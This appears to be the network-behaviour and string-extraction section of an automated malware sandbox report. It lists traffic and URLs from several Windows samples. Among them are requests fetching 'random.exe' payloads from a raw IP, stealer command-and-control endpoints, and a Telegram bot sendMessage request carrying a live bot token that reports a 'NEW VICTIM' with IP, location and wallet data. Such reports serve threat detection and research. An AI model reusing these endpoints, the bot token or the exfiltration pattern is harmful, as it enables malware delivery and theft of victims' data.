Source: global traffic HTTP traffic detected: GET /download?id=1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f&export=download HTTP/1.1User-Agent: FileDownloaderCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /json HTTP/1.1User-Agent: IPInfoFetcherHost: ipinfo.ioCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /bot7855878545:AAEEMUvgpX9jTAxlDd2gM_Sbv2jbI6-5_0o/sendMessage?chat_id=7427009775&text=%3Cb%3E%F0%9F%94%94NEW%20VICTIM%20%2D%20Extensions%20Installed%3C%2Fb%3E%0A%3Cb%3EIP%20Address%3A%3C%2Fb%3E%208%2E46%2E123%2E189%0A%3Cb%3EDevice%20Name%3A%3C%2Fb%3E%20494126%0A%3Cb%3ELocation%3A%3C%2Fb%3E%20New%20York%20City%2C%20New%20York%2C%20US%0A%3Cb%3EWallets%3A%3C%2Fb%3E%0A%3Ccode%3ENothing%20found%3C%2Fcode%3E&parse_mode=HTML HTTP/1.1User-Agent: TelegramBotHost: api.telegram.orgCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /json HTTP/1.1User-Agent: IPInfoFetcherHost: ipinfo.ioCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /bot7855878545:AAEEMUvgpX9jTAxlDd2gM_Sbv2jbI6-5_0o/sendMessage?chat_id=7427009775&text=%3Cb%3E%F0%9F%94%94NEW%20VICTIM%20%2D%20Extensions%20Installed%3C%2Fb%3E%0A%3Cb%3EIP%20Address%3A%3C%2Fb%3E%208%2E46%2E123%2E189%0A%3Cb%3EDevice%20Name%3A%3C%2Fb%3E%20494126%0A%3Cb%3ELocation%3A%3C%2Fb%3E%20New%20York%20City%2C%20New%20York%2C%20US%0A%3Cb%3EWallets%3A%3C%2Fb%3E%0A%3Ccode%3ENothing%20found%3C%2Fcode%3E&parse_mode=HTML HTTP/1.1User-Agent: TelegramBotHost: api.telegram.orgCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: */*
Source: global traffic HTTP traffic detected: GET /files/burpin1/random.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic HTTP traffic detected: GET /files/geopoxid/random.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic HTTP traffic detected: GET /files/zhigarko/random.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic HTTP traffic detected: GET /files/kardanvalov88/random.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic HTTP traffic detected: GET /files/martin/random.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic HTTP traffic detected: GET /files/loadman/random.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic HTTP traffic detected: GET /files/karl/random.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic HTTP traffic detected: GET /zldPRFrmVFHTtKntGpOv1734579851?argument=CmXX9uDEYSg7ov7J1734779763 HTTP/1.1Host: home.fivetk5ht.topAccept: */*
Source: global traffic DNS traffic detected: DNS query: cheapptaxysu.click
Source: global traffic DNS traffic detected: DNS query: drive.google.com
Source: global traffic DNS traffic detected: DNS query: drive.usercontent.google.com
Source: global traffic DNS traffic detected: DNS query: ipinfo.io
Source: global traffic DNS traffic detected: DNS query: api.telegram.org
Source: global traffic DNS traffic detected: DNS query: httpbin.org
Source: global traffic DNS traffic detected: DNS query: home.fivetk5ht.top
Source: global traffic DNS traffic detected: DNS query: treehoneyi.click
Source: unknown HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: cheapptaxysu.click
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 21 Dec 2024 11:15:29 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Frame-Options: SAMEORIGINReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HpnOlsQBYc93jnYqYKuP7cMib0EwdqtVBwn5RuDo56tugvY6ia3%2B3FlLP%2BMIALvVv8C69qFtyb%2FKTwMzISNk73H915lc09QWMM5EuAkCc31EYOR%2BuWNMi1Koc%2F1QynmcNKajayk%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8f57745ffddf424a-EWR
Source: b7c03317c9.exe, 0000002A.00000003.2782175661.0000000007A76000.00000004.00001000.00020000.00000000.sdmp, b7c03317c9.exe, 0000002A.00000002.2930917753.0000000000F9D000.00000040.00000001.01000000.00000014.sdmp String found in binary or memory: http://.css
Source: b7c03317c9.exe, 0000002A.00000003.2782175661.0000000007A76000.00000004.00001000.00020000.00000000.sdmp, b7c03317c9.exe, 0000002A.00000002.2930917753.0000000000F9D000.00000040.00000001.01000000.00000014.sdmp String found in binary or memory: http://.jpg
Source: skotes.exe, 00000005.00000002.2942570852.0000000000D8D000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000005.00000002.2942570852.0000000000D5E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php
Source: skotes.exe, 00000005.00000002.2942570852.0000000000D8D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php;:
Source: skotes.exe, 00000005.00000002.2942570852.0000000000D5E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpO
Source: skotes.exe, 00000005.00000002.2942570852.0000000000D8D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpnu
Source: Gxtuum.exe, 00000026.00000002.2935835447.00000000015C9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://212.193.31.8/
Source: Gxtuum.exe, 00000026.00000002.2935835447.00000000015C9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://212.193.31.8/32
Source: Gxtuum.exe, 00000026.00000002.2935835447.0000000001587000.00000004.00000020.00020000.00000000.sdmp, Gxtuum.exe, 00000026.00000002.2935835447.00000000015C9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://212.193.31.8/3ofn3jf3e2ljk2/index.php
Source: Gxtuum.exe, 00000026.00000002.2935835447.00000000015B3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://212.193.31.8/3ofn3jf3e2ljk2/index.php%
Source: Gxtuum.exe, 00000026.00000002.2935835447.00000000015B3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://212.193.31.8/3ofn3jf3e2ljk2/index.php0
Source: Gxtuum.exe, 00000026.00000002.2935835447.00000000015B3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://212.193.31.8/3ofn3jf3e2ljk2/index.php2
Source: Gxtuum.exe, 00000026.00000002.2935835447.00000000015D8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://212.193.31.8/3ofn3jf3e2ljk2/index.php5
Source: Gxtuum.exe, 00000026.00000002.2935835447.00000000015B3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://212.193.31.8/3ofn3jf3e2ljk2/index.php6
Source: Gxtuum.exe, 00000026.00000002.2935835447.0000000001587000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://212.193.31.8/3ofn3jf3e2ljk2/index.php9
Source: Gxtuum.exe, 00000026.00000002.2935835447.00000000015D8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://212.193.31.8/3ofn3jf3e2ljk2/index.phpO
Source: Gxtuum.exe, 00000026.00000002.2935835447.00000000015D8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://212.193.31.8/3ofn3jf3e2ljk2/index.phpY
Source: Gxtuum.exe, 00000026.00000002.2935835447.00000000015C9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://212.193.31.8/3ofn3jf3e2ljk2/index.phpa=
Source: Gxtuum.exe, 00000026.00000002.2935835447.00000000015C9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://212.193.31.8/3ofn3jf3e2ljk2/index.phpd0f87c9fba7075c3b39K=
Source: Gxtuum.exe, 00000026.00000002.2935835447.00000000015D8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://212.193.31.8/3ofn3jf3e2ljk2/index.phped
Source: Gxtuum.exe, 00000026.00000002.2935835447.00000000015D8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://212.193.31.8/3ofn3jf3e2ljk2/index.phpedh
Source: Gxtuum.exe, 00000026.00000002.2935835447.00000000015D8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://212.193.31.8/3ofn3jf3e2ljk2/index.phpf-
Source: Gxtuum.exe, 00000026.00000002.2935835447.00000000015D8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://212.193.31.8/3ofn3jf3e2ljk2/index.phpurlmon.dll
Source: Gxtuum.exe, 00000026.00000002.2935835447.00000000015C9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://212.193.31.8/A
Source: skotes.exe, 00000005.00000002.2942570852.0000000000D5E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://31.41.244.11/files/burpin1/random.exe
Source: skotes.exe, 00000005.00000002.2942570852.0000000000D5E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://31.41.244.11/files/burpin1/random.exe6H
Source: skotes.exe, 00000005.00000002.2942570852.0000000000D5E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://31.41.244.11/files/burpin1/random.exeC
Source: skotes.exe, 00000005.00000002.2942570852.0000000000D5E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://31.41.244.11/files/burpin1/random.exeD
Source: skotes.exe, 00000005.00000002.2942570852.0000000000D8D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://31.41.244.11/files/geopoxid/random.exe
Source: skotes.exe, 00000005.00000002.2942570852.0000000000D8D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://31.41.244.11/files/kardanvalov88/random.exe
Source: skotes.exe, 00000005.00000002.2942570852.0000000000D8D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://31.41.244.11/files/kardanvalov88/random.exeJ#
Source: skotes.exe, 00000005.00000002.2942570852.0000000000D8D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://31.41.244.11/files/karl/random.exe
Source: skotes.exe, 00000005.00000002.2942570852.0000000000D8D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://31.41.244.11/files/karl/random.exe8476
Source: skotes.exe, 00000005.00000002.2942570852.0000000000D8D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://31.41.244.11/files/karl/random.exeO:
Source: skotes.exe, 00000005.00000002.2942570852.0000000000D8D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://31.41.244.11/files/karl/random.exexe
Source: skotes.exe, 00000005.00000002.2942570852.0000000000D8D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://31.41.244.11/files/loadman/random.exe
Source: skotes.exe, 00000005.00000002.2942570852.0000000000D8D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://31.41.244.11/files/martin/random.exe
Source: skotes.exe, 00000005.00000002.2942570852.0000000000D8D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://31.41.244.11/files/martin/random.exes:4
Source: skotes.exe, 00000005.00000002.2942570852.0000000000D8D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://31.41.244.11/files/zhigarko/random.exe
Source: skotes.exe, 00000005.00000002.2942570852.0000000000D8D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://31.41.244.11/files/zhigarko/random.exeb?
Source: b2885fa695.exe, 00000020.00000003.2630727981.00000000056AD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: b2885fa695.exe, 00000020.00000003.2630727981.00000000056AD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: b2885fa695.exe, 00000020.00000003.2630727981.00000000056AD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: skotes.exe, 00000005.00000002.2942570852.0000000000D79000.00000004.00000020.00020000.00000000.sdmp, 5f0a381314.exe.5.dr String found in binary or memory: http://crl.sectigo.com/SectigoPublicTimeStampingCAR36.crl0z
Source: skotes.exe, 00000005.00000002.2942570852.0000000000D79000.00000004.00000020.00020000.00000000.sdmp, 5f0a381314.exe.5.dr String found in binary or memory: http://crl.sectigo.com/SectigoPublicTimeStampingRootR46.crl0
Source: b2885fa695.exe, 00000020.00000003.2630727981.00000000056AD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: b2885fa695.exe, 00000020.00000003.2630727981.00000000056AD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: b2885fa695.exe, 00000020.00000003.2630727981.00000000056AD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: b2885fa695.exe, 00000020.00000003.2630727981.00000000056AD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: skotes.exe, 00000005.00000002.2942570852.0000000000D79000.00000004.00000020.00020000.00000000.sdmp, 5f0a381314.exe.5.dr String found in binary or memory: http://crt.sectigo.com/SectigoPublicTimeStampingCAR36.crt0#
Source: skotes.exe, 00000005.00000002.2942570852.0000000000D79000.00000004.00000020.00020000.00000000.sdmp, 5f0a381314.exe.5.dr String found in binary or memory: http://crt.sectigo.com/SectigoPublicTimeStampingRootR46.p7c0#
Source: b7c03317c9.exe, 0000002A.00000002.2930917753.0000000000F9D000.00000040.00000001.01000000.00000014.sdmp String found in binary or memory: http://home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv17
Source: b7c03317c9.exe, 0000002A.00000002.2930917753.0000000000F9D000.00000040.00000001.01000000.00000014.sdmp String found in binary or memory: http://home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv1734579851
Source: b7c03317c9.exe, 0000002A.00000002.2943794217.0000000001EC7000.00000004.00000020.00020000.00000000.sdmp, b7c03317c9.exe, 0000002A.00000002.2943794217.0000000001EB3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv1734579851?argument=CmXX9uDEYSg7ov7J1734779763
Source: b7c03317c9.exe, 0000002A.00000002.2943794217.0000000001EC7000.00000004.00000020.00020000.00000000.sdmp, b7c03317c9.exe, 0000002A.00000002.2943794217.0000000001EB3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv1734579851?argument=CmXX9uDEYSg7ov7J1734779763G
Source: b7c03317c9.exe, 0000002A.00000002.2930917753.0000000000F9D000.00000040.00000001.01000000.00000014.sdmp String found in binary or memory: http://home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv1734579851http://home.fivetk5ht.top/zldPRFrmVFHTtKntGp
Source: b7c03317c9.exe, 0000002A.00000003.2782175661.0000000007A76000.00000004.00001000.00020000.00000000.sdmp, b7c03317c9.exe, 0000002A.00000002.2930917753.0000000000F9D000.00000040.00000001.01000000.00000014.sdmp String found in binary or memory: http://html4/loose.dtd
Source: b2885fa695.exe, 00000020.00000003.2630727981.00000000056AD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0
Source: b2885fa695.exe, 00000020.00000003.2630727981.00000000056AD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: skotes.exe, 00000005.00000002.2942570852.0000000000D79000.00000004.00000020.00020000.00000000.sdmp, 5f0a381314.exe.5.dr String found in binary or memory: http://ocsp.sectigo.com0
Source: 322c3dce5b.exe, 00000033.00000002.2940029679.0000000002321000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: 5f0a381314.exe, 00000006.00000000.2443755959.0000000000423000.00000002.00000001.01000000.00000009.sdmp, 5f0a381314.exe.5.dr String found in binary or memory: http://usbtor.ru/viewtopic.php?t=798)Z
Source: b2885fa695.exe, 00000020.00000003.2630727981.00000000056AD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://x1.c.lencr.org/0
Source: b2885fa695.exe, 00000020.00000003.2630727981.00000000056AD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://x1.i.lencr.org/0
Source: b2885fa695.exe, 00000020.00000003.2582356457.00000000056AD000.00000004.00000800.00020000.00000000.sdmp, b2885fa695.exe, 00000020.00000003.2582557045.00000000056AA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: 4115805b10.exe, 00000028.00000002.2819650802.000001E365837000.00000004.00000020.00020000.00000000.sdmp, 4115805b10.exe, 00000028.00000002.2820245543.000001E3661E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/
Source: 4115805b10.exe, 00000028.00000002.2820245543.000001E3661E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/-GB
Source: 4115805b10.exe, 00000027.00000002.2797301812.00000268125B0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/1
Source: 4115805b10.exe, 00000028.00000002.2819650802.000001E365837000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/:Gr
Source: 4115805b10.exe, 00000028.00000002.2819650802.000001E365837000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/CO3r
Source: 4115805b10.exe, 00000027.00000002.2797301812.00000268125B0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/a
Source: 4115805b10.exe, 00000028.00000000.2667326161.00007FF6BDA40000.00000002.00000001.01000000.00000012.sdmp String found in binary or memory: https://api.telegram.org/bot
Source: 4115805b10.exe, 00000028.00000002.2820245543.000001E3661E0000.00000004.00000020.00020000.00000000.sdmp, 4115805b10.exe, 00000028.00000002.2819650802.000001E36587C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot7855878545:AAEEMUvgpX9jTAxlDd2gM_Sbv2jbI6-5_0o/sendMessage?chat_id=74270
Source: 4115805b10.exe, 00000027.00000000.2649047959.00007FF6BDA40000.00000002.00000001.01000000.00000012.sdmp, 4115805b10.exe, 00000027.00000002.2797453206.00007FF6BDA40000.00000002.00000001.01000000.00000012.sdmp, 4115805b10.exe, 00000028.00000002.2820458214.00007FF6BDA40000.00000002.00000001.01000000.00000012.sdmp, 4115805b10.exe, 00000028.00000000.2667326161.00007FF6BDA40000.00000002.00000001.01000000.00000012.sdmp String found in binary or memory: https://api.telegram.org/botFailed
Source: 4115805b10.exe, 00000028.00000002.2819650802.000001E365837000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/grkrs
Source: 4115805b10.exe, 00000027.00000002.2797301812.00000268125B0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/h
Source: 4115805b10.exe, 00000028.00000002.2820245543.000001E3661E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/ogle
Source: 4115805b10.exe, 00000027.00000002.2797099055.0000026810A08000.00000004.00000020.00020000.00000000.sdmp, 4115805b10.exe, 00000027.00000003.2795798018.0000026810A08000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/p
Source: b2885fa695.exe, 00000020.00000003.2661685253.0000000005661000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
Source: b2885fa695.exe, 00000020.00000003.2582356457.00000000056AD000.00000004.00000800.00020000.00000000.sdmp, b2885fa695.exe, 00000020.00000003.2582557045.00000000056AA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: b2885fa695.exe, 00000020.00000003.2582356457.00000000056AD000.00000004.00000800.00020000.00000000.sdmp, b2885fa695.exe, 00000020.00000003.2582557045.00000000056AA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: b2885fa695.exe, 00000020.00000003.2582356457.00000000056AD000.00000004.00000800.00020000.00000000.sdmp, b2885fa695.exe, 00000020.00000003.2582557045.00000000056AA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: b2885fa695.exe, 00000020.00000003.2559287290.0000000000D13000.00000004.00000020.00020000.00000000.sdmp, b2885fa695.exe, 00000020.00000003.2759950146.0000000000D2A000.00000004.00000020.00020000.00000000.sdmp, b2885fa695.exe, 00000020.00000002.2764183695.0000000000D2A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cheapptaxysu.click/
Source: b2885fa695.exe, 00000020.00000003.2759950146.0000000000D2A000.00000004.00000020.00020000.00000000.sdmp, b2885fa695.exe, 00000020.00000002.2764183695.0000000000D2A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cheapptaxysu.click/9
Source: b2885fa695.exe, 00000020.00000003.2759950146.0000000000D2A000.00000004.00000020.00020000.00000000.sdmp, b2885fa695.exe, 00000020.00000002.2764183695.0000000000D2A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cheapptaxysu.click/Q
Source: b2885fa695.exe, 00000020.00000003.2686595989.000000000566B000.00000004.00000800.00020000.00000000.sdmp, b2885fa695.exe, 00000020.00000002.2764183695.0000000000D0E000.00000004.00000020.00020000.00000000.sdmp, b2885fa695.exe, 00000020.00000003.2691499194.000000000566B000.00000004.00000800.00020000.00000000.sdmp, b2885fa695.exe, 00000020.00000003.2686509398.0000000000D9A000.00000004.00000020.00020000.00000000.sdmp, b2885fa695.exe, 00000020.00000003.2759368892.000000000566B000.00000004.00000800.00020000.00000000.sdmp, b2885fa695.exe, 00000020.00000003.2736603243.000000000566B000.00000004.00000800.00020000.00000000.sdmp, b2885fa695.exe, 00000020.00000003.2662018084.000000000566B000.00000004.00000800.00020000.00000000.sdmp, b2885fa695.exe, 00000020.00000003.2759950146.0000000000D0D000.00000004.00000020.00020000.00000000.sdmp, b2885fa695.exe, 00000020.00000002.2764183695.0000000000D0A000.00000004.00000020.00020000.00000000.sdmp, b2885fa695.exe, 00000020.00000003.2759950146.0000000000D2A000.00000004.00000020.00020000.00000000.sdmp, b2885fa695.exe, 00000020.00000002.2764183695.0000000000D2A000.00000004.00000020.00020000.00000000.sdmp, b2885fa695.exe, 00000020.00000002.2768801255.000000000566B000.00000004.00000800.00020000.00000000.sdmp, b2885fa695.exe, 00000020.00000003.2692865661.0000000000D9E000.00000004.00000020.00020000.00000000.sdmp, b2885fa695.exe, 00000020.00000003.2661685253.000000000566B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://cheapptaxysu.click/api
Source: b2885fa695.exe, 00000020.00000003.2758836379.0000000000D9E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cheapptaxysu.click/api%L8
Source: b2885fa695.exe, 00000020.00000003.2759119506.0000000000D90000.00000004.00000020.00020000.00000000.sdmp, b2885fa695.exe, 00000020.00000002.2765530714.0000000000D90000.00000004.00000020.00020000.00000000.sdmp, b2885fa695.exe, 00000020.00000003.2735992155.0000000000D84000.00000004.00000020.00020000.00000000.sdmp, b2885fa695.exe, 00000020.00000003.2736434954.0000000000D8D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cheapptaxysu.click/api5RJ1JZ
Source: b2885fa695.exe, 00000020.00000003.2706084690.0000000000D93000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cheapptaxysu.click/api:L_
Source: b2885fa695.exe, 00000020.00000003.2686509398.0000000000D9A000.00000004.00000020.00020000.00000000.sdmp, b2885fa695.exe, 00000020.00000003.2692865661.0000000000D9E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cheapptaxysu.click/apiCN
Source: b2885fa695.exe, 00000020.00000003.2559195373.0000000000D2C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cheapptaxysu.click/apiD
Source: b2885fa695.exe, 00000020.00000003.2686509398.0000000000D9A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cheapptaxysu.click/apiGM
Source: b2885fa695.exe, 00000020.00000003.2686509398.0000000000D9A000.00000004.00000020.00020000.00000000.sdmp, b2885fa695.exe, 00000020.00000003.2692865661.0000000000D9E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cheapptaxysu.click/apiIN
Source: b2885fa695.exe, 00000020.00000003.2686509398.0000000000D9A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cheapptaxysu.click/apioca
Source: b2885fa695.exe, 00000020.00000003.2758836379.0000000000D9E000.00000004.00000020.00020000.00000000.sdmp, b2885fa695.exe, 00000020.00000002.2765612695.0000000000D9E000.00000004.00000020.00020000.00000000.sdmp, b2885fa695.exe, 00000020.00000003.2706084690.0000000000D93000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cheapptaxysu.click:443/apic
Source: 4115805b10.exe, 00000028.00000003.2690889016.000001E365822000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstore
Source: 4115805b10.exe, 00000027.00000003.2670828927.0000026810994000.00000004.00000020.00020000.00000000.sdmp, 4115805b10.exe, 00000027.00000003.2670730816.0000026810978000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstore-l
Source: 4115805b10.exe, 00000027.00000003.2670828927.0000026810994000.00000004.00000020.00020000.00000000.sdmp, 4115805b10.exe, 00000027.00000003.2670730816.0000026810978000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstore2R
Source: 4115805b10.exe, 00000028.00000003.2691236731.000001E365820000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://clients2.google.com/service/update2/crx
Source: 4115805b10.exe, 00000027.00000003.2670730816.0000026810978000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://clients2.google.com/service/update2/crx0B
Source: 4115805b10.exe, 00000027.00000003.2671262555.0000026810961000.00000004.00000020.00020000.00000000.sdmp, 4115805b10.exe, 00000027.00000003.2671446840.0000026810961000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://clients2.google.com/service/update2/crx1F11
Source: 4115805b10.exe, 00000028.00000003.2691236731.000001E365820000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://clients2.google.com/service/update2/crx7ED0
Source: 4115805b10.exe, 00000027.00000003.2671674540.0000026810983000.00000004.00000020.00020000.00000000.sdmp, 4115805b10.exe, 00000027.00000003.2670962130.000002681097E000.00000004.00000020.00020000.00000000.sdmp, 4115805b10.exe, 00000027.00000003.2671383618.000002681097F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://clients2.google.com/service/update2/crxLB
Source: 4115805b10.exe, 00000028.00000003.2691236731.000001E365820000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://clients2.google.com/service/update2/crxip:i
Source: b2885fa695.exe, 00000020.00000003.2661685253.0000000005661000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
Source: b7c03317c9.exe, 0000002A.00000002.2930917753.0000000000F9D000.00000040.00000001.01000000.00000014.sdmp String found in binary or memory: https://curl.se/docs/alt-svc.html
Source: b7c03317c9.exe, 0000002A.00000002.2930917753.0000000000F9D000.00000040.00000001.01000000.00000014.sdmp String found in binary or memory: https://curl.se/docs/hsts.html
Source: b7c03317c9.exe, 0000002A.00000003.2782175661.0000000007A76000.00000004.00001000.00020000.00000000.sdmp, b7c03317c9.exe, 0000002A.00000002.2930917753.0000000000F9D000.00000040.00000001.01000000.00000014.sdmp String found in binary or memory: https://curl.se/docs/http-cookies.html
Source: 4115805b10.exe, 00000028.00000003.2692021259.000001E36584F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/
Source: 4115805b10.exe, 00000028.00000003.2690027055.000001E365823000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/presentation/installwebapp?usp=chrome_default
Source: 4115805b10.exe, 00000027.00000003.2670498259.0000026810976000.00000004.00000020.00020000.00000000.sdmp, 4115805b10.exe, 00000028.00000003.2690201104.000001E365831000.00000004.00000020.00020000.00000000.sdmp, 4115805b10.exe, 00000028.00000003.2690027055.000001E365823000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/spreadsheets/installwebapp?usp=chrome_default
Source: 4115805b10.exe, 00000028.00000003.2690201104.000001E365831000.00000004.00000020.00020000.00000000.sdmp, 4115805b10.exe, 00000028.00000003.2690027055.000001E365823000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/spreadsheets/installwebapp?usp=chrome_defaultr
